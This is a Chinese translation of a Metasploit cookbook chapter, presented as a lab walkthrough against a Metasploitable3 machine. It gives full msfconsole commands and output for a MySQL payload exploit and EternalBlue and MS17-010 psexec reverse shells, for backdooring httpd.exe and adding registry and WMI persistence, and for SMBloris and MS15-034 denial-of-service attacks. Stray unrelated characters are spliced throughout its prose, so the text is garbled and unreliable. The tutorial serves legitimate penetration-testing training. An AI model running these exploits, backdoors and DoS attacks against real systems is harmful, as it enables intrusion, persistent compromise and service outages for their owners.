Metasploit 滲透測試手冊第三版 第三章 服務(wù)端漏洞利用(2)(翻譯)

接上篇:Metasploit 滲透測試手冊第三版 第三章 服務(wù)端漏洞利用(1)

5、利用公用服務(wù)

在漏洞攻擊時峡继,有些服務(wù)跟目標(biāo)上其他大部分服務(wù)都有關(guān)系岸梨,而大多數(shù)是情況下它們被忽視了。

準(zhǔn)備工作

在本節(jié)中篷扩,我們將利用目標(biāo)環(huán)境中最常見和最容易被濫用的服務(wù)-Mysql兄猩。大多數(shù)情況下,我們可以利用Mysql服務(wù)鉴未,因為它們是出于開發(fā)目的安裝的枢冤。忽略了一些安全加固。比如設(shè)置root密碼或者設(shè)置強密碼歼狼。

本節(jié)我們將使用Metasploitable3作為靶機

怎么做

要利用目標(biāo)的Mysql服務(wù)掏导,我們先使用MySQL枚舉模塊枚舉目標(biāo),然后使用Oracle MySQL for the Microsoft Windows Payload攻擊模塊獲取遠程主機的shell羽峰。

TIP:mysql_paylod模塊在新版的Metasploit中被移除了趟咆。不過你可以從 https://www.exploit-db.com/download/16957下載這個模塊,放到Metasploit對應(yīng)的模塊目錄中(/usr/share/metasploit-framework/modules/exploits/windows/mysql)梅屉,修改代碼的前面幾行為如下內(nèi)容就行值纱。

##                                                                        
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $                 
##                                                                        
                                                                          
##                                                                        
# This file is part of the Metasploit Framework and may be subject to     
# redistribution and commercial restrictions. Please see the Metasploit   
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/                                        
##                                                                        
                                                                          
require 'msf/core'                                                        
                                                                          
class MetasploitModule < Msf::Exploit::Remote                             
        Rank = ExcellentRanking                                           
                                                                          
        include Msf::Exploit::Remote::MYSQL                               
        include Msf::Exploit::CmdStager

枚舉:

msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144

[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Compiled for the following OS: Win64
[*] 192.168.177.144:3306 -      Architecture: x86
[*] 192.168.177.144:3306 -      Server Hostname: metasploitable3
[*] 192.168.177.144:3306 -      Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 -      Logging of queries and logins: OFF
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 -      Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 -      Allow Table Merge:
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[*] 192.168.177.144:3306 -      The following users have GRANT Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -      The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      Anonymous Accounts are Present:
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -      The following accounts have empty passwords:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts are not restricted by source:
[*] 192.168.177.144:3306 -              User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >

進行攻擊:

msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

如果目標(biāo)Mysql沒有設(shè)置root密碼,因此可以使用 MySQL服務(wù)上傳shell并獲得系統(tǒng)的遠程訪問權(quán)限坯汤。就像上面一樣虐唠。所以,永遠不要忘記對基礎(chǔ)服務(wù)進行滲透測試惰聂。即便你認為不會有人傻到配置無密碼的服務(wù)疆偿。

6嗜价、MS17-010 永恒之藍 SMB遠程代碼執(zhí)行Windows內(nèi)核破壞

再次利用在信息收集和掃描階段收集的信息约谈,特別是MS17-010 SMB RCE檢測輔助模塊的輸出信息箭启,我們可以轉(zhuǎn)向下一個易受攻擊的服務(wù)塌忽。

準(zhǔn)備工作

MS17-010 EthernalBlue SMB Remote Windows Kernel Pool Corruption攻擊模塊是Equation Group ETERNALBLUE的一部分青伤。Equation Group ETERNALBLUEFuzzBunch toolkit的一部分膘壶。由Shadow Brokrs從美國國家安全局(NSA)獲取并公開晾嘶。ETERNALBLUE通常被認為是由NSA開發(fā)幽邓。它利用srv.sys在處理SrvOs2FeaListSizeToNt的時候邏輯不正確導(dǎo)致越界拷貝從而造成緩沖區(qū)溢出,進而允許我們執(zhí)行任意命令撤蟆。它在被公開后被用在WannaCry勒索軟件中進行攻擊奕塑。此漏洞會影響所有運行SMBv1服務(wù)且未更新SMB安全補丁的Windows計算機和Windows服務(wù)器。

怎么做

載入ms17_010_eternalblue模塊家肯,設(shè)置目標(biāo)IP地址龄砰,設(shè)置Payload,然后執(zhí)行攻擊

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.177.144:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

7息楔、MS17-010 EternalRomance/EternalSynergy/EternalChampion

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution攻擊模塊也可用于MS17-0101漏洞利用寝贡。而且比EnternalBlue更可靠,不過需要命名管道值依。

怎么做

使用模塊ms17_010_psexec

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

8圃泡、安裝后門

獲取shell后,我們?nèi)绻枰_保能持久性的訪問目標(biāo)系統(tǒng)愿险,我們需要安裝后門颇蜡。

準(zhǔn)備工作

通過之前的漏洞利用,我們已經(jīng)獲得了與目標(biāo)機的session辆亏,我們將利用meterpreter session來安裝后門服務(wù)风秤。這里以httpd.exe為例。

meterpreter > ps -S httpd.exe           
Filtering on 'httpd.exe'                                                       
Process List                                                                                                                                   
============                                                                                                                                  
 PID   PPID  Name               Arch  Session  User                        Path                                                                
 ---   ----  ----               ----  -------  ----                        ----                                                                
 1304  1816  dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 1816  472   dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 3180  472   httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe                       
 3880  3180  httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe       
meterpreter >

接下來扮叨,我們將利用windows注冊表持久性模塊安裝隨系統(tǒng)啟動的后門缤弦。

最后我們將利用WMI( Windows Management Instrumentation )創(chuàng)建一個無文件后門。

怎么做

1彻磁、不能在程序運行的時候安裝后門碍沐,所以先殺死進程

meterpreter > kill 3880
Killing: 3880
meterpreter >

2、將需要替換成后門的程序下載下來

meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >

3衷蜓、將會話退回到后臺累提,使用reverse_tcp攻擊載荷,使用generate生成后門文件磁浇。

msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >

關(guān)于generate的參數(shù)說明斋陪,可以查看幫助信息

msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce approproate NOPsled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -s <opt>  NOP sled length.
    -x <opt>  Specify a custom executable file to use as a template

4、啟動一個監(jiān)聽置吓,監(jiān)聽后門的反向連接无虚,并使用expolit -j放到后臺運行

msf5 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:4444
msf5 exploit(multi/handler) >

5、切回之前的meterpreter session衍锚,上傳后門文件并重命名友题。

msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > cd C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > mv httpd.exe httpd.exe.backup
meterpreter > upload /root/httpd-backdoored.exe
[*] uploading  : /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd-backdoored.exe -> httpd-backdoored.exe
[*] uploaded   : /root/httpd-backdoored.exe -> httpd-backdoored.exe
meterpreter > mv httpd-backdoored.exe httpd.exe
meterpreter >

6、使用shell命令進入目標(biāo)系統(tǒng)的shell,重啟wampapache服務(wù)构拳。

meterpreter > shell
Process 1976 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\apache2.2.21\bin>net stop wampapache
net stop wampapache
The wampapache service is stopping.net sta
The wampapache service was stopped successfully.
C:\wamp\bin\apache\apache2.2.21\bin>net start wampapache

[*] Sending stage (206403 bytes) to 192.168.177.144
net start wampapache
The wampapache service is starting.
The wampapache service was started successfully.

你會發(fā)現(xiàn)咆爽,服務(wù)啟動后,返回了新的會話

C:\wamp\bin\apache\apache2.2.21\bin>[*] Meterpreter session 4 opened (192.168.177.143:4444 -> 192.168.177.144:63068) at 2019-04-28 10:32:44 +0800
[*] Sending stage (206403 bytes) to 192.168.177.144
[*] Meterpreter session 5 opened (192.168.177.143:4444 -> 192.168.177.144:63069) at 2019-04-28 10:32:59 +0800
....
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3         192.168.177.143:4444 -> 192.168.177.144:62506 (192.168.177.144)
  4         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63068 (192.168.177.144)
  5         meterpreter x64/windows  NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3  192.168.177.143:4444 -> 192.168.177.144:63069 (192.168.177.144)

msf5 exploit(multi/handler) >

7置森、使用Windows注冊表持久化模塊植入后門斗埂。我們利用永恒之藍攻擊獲得的會話進行后門植入操作。

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/registry_persistence
smsf5 exploit(windows/local/registry_persistence) > set SESSION 6
SESSION => 6
msf5 exploit(windows/local/registry_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/registry_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/registry_persistence) > set LPORT 9999
msf5 exploit(windows/local/registry_persistence) > exploit

[*] Generating payload blob..
[+] Generated payload, 5944 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\cPH3pG4G
[+] Installed payload blob to HKCU\Software\cPH3pG4G\q3jhQYTs
[*] Installing run key
[-] Exploit aborted due to failure: unknown: Could not install run key
msf5 exploit(windows/local/registry_persistence) >

這里因為環(huán)境問題凫海,并未植入成功呛凶。

8、如果成功行贪,然后就可以設(shè)置監(jiān)聽漾稀,以便目標(biāo)重啟的時候獲得反向shell會話

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/handler) > set LPORT 9999
LPORT => 9999
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.177.143:9999
msf5 exploit(multi/handler) >

9、當(dāng)目標(biāo)機器重啟后建瘫,可以獲得會話

meterpreter > reboot
Rebooting...

10崭捍、利用WMI事件訂閱創(chuàng)建無文件后門

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/local/wmi_persistence
msf5 exploit(windows/local/wmi_persistence) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/wmi_persistence) > set CALLBACK_INTERVAL 60000 //設(shè)置回調(diào)時間為1分鐘
CALLBACK_INTERVAL => 60000
msf5 exploit(windows/local/wmi_persistence) > set EVENT_ID_TRIGGER 4624 //設(shè)置事件ID
EVENT_ID_TRIGGER => 4624
msf5 exploit(windows/local/wmi_persistence) > set USERNAME_TRIGGER Administrator //設(shè)置用戶
USERNAME_TRIGGER => Administrator
msf5 exploit(windows/local/wmi_persistence) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
smsf5 exploit(windows/local/wmi_persistence) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/local/wmi_persistence) > set LPORT 4433
LPORT => 4433
msf5 exploit(windows/local/wmi_persistence) > exploit

[-] This module cannot run as System

11、提示未成功啰脚,我們可以使用migratemeterpreter shell進程進行進程遷移殷蛇,就是將meterpreter shell進程遷移到相對穩(wěn)定應(yīng)用的進程里。

msf5 exploit(windows/local/wmi_persistence) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name                           Arch  Session  User                          Path
 ---   ----  ----                           ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                         x64   0
 232   4     smss.exe                       x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 300   472   svchost.exe                    x64   0        NT AUTHORITY\NETWORK SERVICE
 316   304   csrss.exe                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 324   5624  explorer.exe                   x64   1        METASPLOITABLE3\vagrant       C:\Windows\Explorer.EXE
 .....
meterpreter > migrate -N explorer.exe //進程遷移不一定每次都能成功橄浓,可以多試幾次
[*] Migrating from 1088 to 5624...
[*] Migration completed successfully.
meterpreter >

然后再次攻擊

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/wmi_persistence) > exploit

[*] Installing Persistence...
[+]  - Bytes remaining: 12560
[+]  - Bytes remaining: 4560
[+] Payload successfully staged.
[+] Persistence installed! Call a shell using "smbclient \\\\192.168.177.144\\C$ -U Administrator <arbitrary password>"
[*] Clean up Meterpreter RC file: /root/.msf4/logs/wmi_persistence/192.168.177.144_20190428.2114/192.168.177.144_20190428.2114.rc
msf5 exploit(windows/local/wmi_persistence) >

注銷目標(biāo)機登錄粒梦,然后重新登錄,msfconsole這邊就會接收到回連的會話

[*] Meterpreter session 2 opened (192.168.177.143:4433 -> 192.168.177.144:49437) at 2019-04-28 12:27:54 +0800

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

9荸实、拒絕服務(wù)攻擊

拒絕服務(wù)攻擊通常是通過向目標(biāo)機請求大量的資源或利用漏洞匀们,造成拒絕服務(wù)攻擊,消耗目標(biāo)機器性能准给,拒絕服務(wù)攻擊會導(dǎo)致合法用戶無法訪問計算機服務(wù)或資源泄朴,甚至可能會導(dǎo)致服務(wù)或操作系統(tǒng)崩潰。

準(zhǔn)備工作

SMBloris是一個已經(jīng)存在了20 年的 Windows SMB 漏洞圆存,此漏洞可導(dǎo)致拒絕服務(wù)攻擊( DoS ) , 使得大規(guī)模服務(wù)器癱瘓叼旋。影響所有版本的 SMB 協(xié)議以及所有Windows 2000 之后的系統(tǒng)版本。

怎么做

1沦辙、在進行SMBloris拒絕服務(wù)攻擊之前夫植,要先設(shè)置攻擊機的最大連接數(shù)。

root@osboxes:~# ulimit -n 65535
root@osboxes:~# ulimit -n
65535
root@osboxes:~#

2油讯、然后使用smb_loris模塊來攻擊目標(biāo)機機器

msf5 auxiliary(dos/smb/smb_loris) > set RHOST 192.168.177.144
RHOST => 192.168.177.144
msf5 auxiliary(dos/smb/smb_loris) > run

[*] Starting server...
[*] 192.168.177.144:445 - 100 socket(s) open
[*] 192.168.177.144:445 - 200 socket(s) open
[*] 192.168.177.144:445 - 300 socket(s) open
[*] 192.168.177.144:445 - 400 socket(s) open
[*] 192.168.177.144:445 - 500 socket(s) open
[*] 192.168.177.144:445 - 600 socket(s) open
[*] 192.168.177.144:445 - 700 socket(s) open
[*] 192.168.177.144:445 - 800 socket(s) open
[*] 192.168.177.144:445 - 900 socket(s) open
[*] 192.168.177.144:445 - 1000 socket(s) open
[!] 192.168.177.144:445 - At open socket limit with 1017 sockets open. Try increasing you system limits.
[*] 192.168.177.144:445 - 1017 socket(s) open
[*] 192.168.177.144:445 - Holding steady at 1017 socket(s) open

3详民、查看目標(biāo)機器,我們可以看到由于攻擊者發(fā)送了大量的SMB請求消耗了目標(biāo)機的大量內(nèi)存陌兑。每一個 NBSS 連接可以申請分配 128 KB 內(nèi)存空間沈跨,在建立大量連接的情況下可以耗盡內(nèi)存,達到拒絕服務(wù)的效果兔综。

image

另一個可怕的DoS攻擊是MS15-034HTTP協(xié)議棧請求處理拒絕服務(wù)饿凛。

如果Microsoft Windows 7, Windows 8, Windows Server 2008, or Windows Server 2012機器正在運行了存在MS15-034漏洞的IIS服務(wù)狞玛,那么可以利用這個漏洞導(dǎo)致目標(biāo)服務(wù)器崩潰。

msf5 > use auxiliary/dos/http/ms15_034_ulonglongadd
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) > exploit

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(dos/http/ms15_034_ulonglongadd) >
image

可以看到涧窒,目標(biāo)死機藍屏了心肪。

相關(guān)實驗在線學(xué)習(xí)

Metasploit攻擊linux實例

Metasploit攻擊winserver2008實例

第四章 Meterpreter (預(yù)告)

在本章中,我們將學(xué)習(xí)以下內(nèi)容:

1纠吴、了解Meterpreter核心命令

2硬鞍、了解Meterpreter文件系統(tǒng)命令

3、了解Meterpreter網(wǎng)絡(luò)命令

4戴已、了解Meterpreter系統(tǒng)命令

5固该、與目標(biāo)建立多重通信信道

6、Meterpreter反取證

7糖儡、屏幕和鍵盤監(jiān)聽

8伐坏、使用 scraper Merterpreter腳本

9、使用 winenum 枚舉系統(tǒng)信息

10握联、自動化腳本

11著淆、Meterpreter資源腳本

12、Meterpreter超時控制

13拴疤、Meterpreter休眠控制

14永部、Meterpreter傳輸

15、注冊表操作

16呐矾、加載框架插件

17苔埋、API和Mixins

18、Railgun——將Ruby轉(zhuǎn)換為武器

19蜒犯、向Railgun中添加DLL和函數(shù)定義

20组橄、劫持遠程VNC

21、開啟遠程桌面

說明

原書:《Metasploit Penetration Testing Cookbook - Third Edition》

https://www.packtpub.com/networking-and-servers/metasploit-penetration-testing-cookbook-third-edition

本文由合天網(wǎng)安實驗室編譯罚随,轉(zhuǎn)載請注明來源玉工。

關(guān)于合天網(wǎng)安實驗室

合天網(wǎng)安實驗室(www.hetianlab.com)-國內(nèi)領(lǐng)先的實操型網(wǎng)絡(luò)安全在線教育平臺

